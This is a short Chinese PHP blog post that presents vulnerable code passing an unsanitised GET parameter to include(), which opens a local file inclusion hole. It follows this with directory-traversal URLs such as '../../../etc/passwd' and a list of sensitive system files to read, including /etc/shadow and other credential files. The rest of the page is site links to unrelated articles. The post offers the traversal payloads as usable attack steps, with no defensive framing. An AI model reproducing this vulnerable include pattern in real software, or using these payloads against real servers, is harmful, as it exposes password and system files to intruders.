编程 PHP

php 伪造本地文件包含漏洞的代码

Posted in PHP onNovember 03, 2011

代码:

<?php 
$page=$_GET['page']; 
include($page.'php'); 
?>

你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

来自hackteach

php 伪造本地文件包含漏洞的代码

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐

实现树状结构的两种方法

Oct 09 PHP

用php来检测proxy

Oct 09 PHP

Email+URL的判断和自动转换函数

Oct 09 PHP

PHP 危险函数解释分析

Apr 22 PHP

php缩放图片(根据宽高的等比例缩放)实例介绍

Jun 09 PHP

PHP截断标题且兼容utf8和gb2312编码

Sep 22 PHP

PHP函数strip_tags的一个bug浅析

May 22 PHP

php读取qqwry.dat ip地址定位文件的类实例代码

Nov 15 PHP

PHP实现批量清空删除指定文件夹所有内容的方法

May 30 PHP

Laravel获取当前请求的控制器和方法以及中间件的例子

Oct 11 PHP

php 利用socket发送GET，POST请求的实例代码

Jul 04 PHP

PHP如何获取Cookie并实现模拟登录

Jul 16 PHP

有关php运算符的知识大全

Nov 03 #PHP

PHP读取txt文件的内容并赋值给数组的代码

Nov 03 #PHP

PHP支持多种格式图片上传(支持jpg、png、gif)

Nov 03 #PHP

PHP安全防范技巧分享

Nov 03 #PHP

防止本地用户用fsockopen DDOS攻击对策

Nov 02 #PHP

PHP隐形一句话后门，和ThinkPHP框架加密码程序(base64_decode)

Nov 02 #PHP

php数组函数序列之krsort()- 对数组的元素键名进行降序排序,保持索引关系

Nov 02 #PHP

Quartz(1) HttpClient(1) Hive(5) 注解(1) scrapy(1) 反射(1) BottomSheetDialog(1) RestTemplate(1) dataBinding(1) ip2region(1)

You might like

深入PHP中的HashTable结构详解

2013/06/13 PHP

PHP加密解密字符串汇总

2015/04/26 PHP

PHP MVC框架中类的自动加载机制实例分析

2019/09/18 PHP

图片连续滚动代码[兼容IE/firefox]

2009/06/11 Javascript

网页自动跳转代码收集

2009/09/27 Javascript

js 省地市级联选择

2010/02/07 Javascript

JavaScript的递归之递归与循环示例介绍

2013/08/05 Javascript

JavaScript定时显示广告代码分享

2015/03/02 Javascript

js实现兼容IE和FF的上下层的移动

2015/05/04 Javascript

jquery简单实现带渐显效果的选项卡菜单代码

2015/09/01 Javascript

jQuery增加与删除table列的方法

2016/03/01 Javascript

微信小程序开发指南详解

2016/09/27 Javascript

那些精彩的JavaScript代码片段

2017/01/12 Javascript

nodejs搭建本地http服务器教程

2017/03/13 NodeJs

bootstrap的工具提示实例代码

2017/05/17 Javascript

vue生命周期和react生命周期对比【推荐】

2018/09/19 Javascript

Layui 带多选框表格监听事件以及按钮自动点击写法实例

2019/09/02 Javascript

vue中的使用token的方法示例

2020/03/10 Javascript

vue基于better-scroll仿京东分类列表

2020/06/30 Javascript

vue和H5 draggable实现拖拽并替换效果

2020/07/29 Javascript

使用Typescript开发微信小程序的步骤详解

2021/01/12 Javascript

python以环状形式组合排列图片并输出的方法

2015/03/17 Python

基于Python在MacOS上安装robotframework-ride

2018/12/28 Python

你还在@微信官方？聊聊Python生成你想要的微信头像

2019/09/25 Python

python如果快速判断数字奇数偶数

2019/11/13 Python

Python3.7黑帽编程之病毒篇（基础篇）

2020/02/04 Python

移动Web—CSS为Retina屏幕替换更高质量的图片

2012/12/24 HTML / CSS

使用html5 canvas创建太空游戏的示例

2014/05/08 HTML / CSS

亚洲领先的设计购物网站：Pinkoi

2020/11/26 全球购物

在阿联酋购买翻新手机和平板电脑：Teckzu

2021/02/12 全球购物

端午节活动策划方案

2014/03/09 职场文书

交通事故调解协议书

2014/04/16 职场文书

党员个人总结范文

2015/02/14 职场文书

求职自荐信怎么写

2015/03/04 职场文书

2015年助理政工师工作总结

2015/05/26 职场文书

javascript代码简写的几种常用方式汇总

2021/08/23 Javascript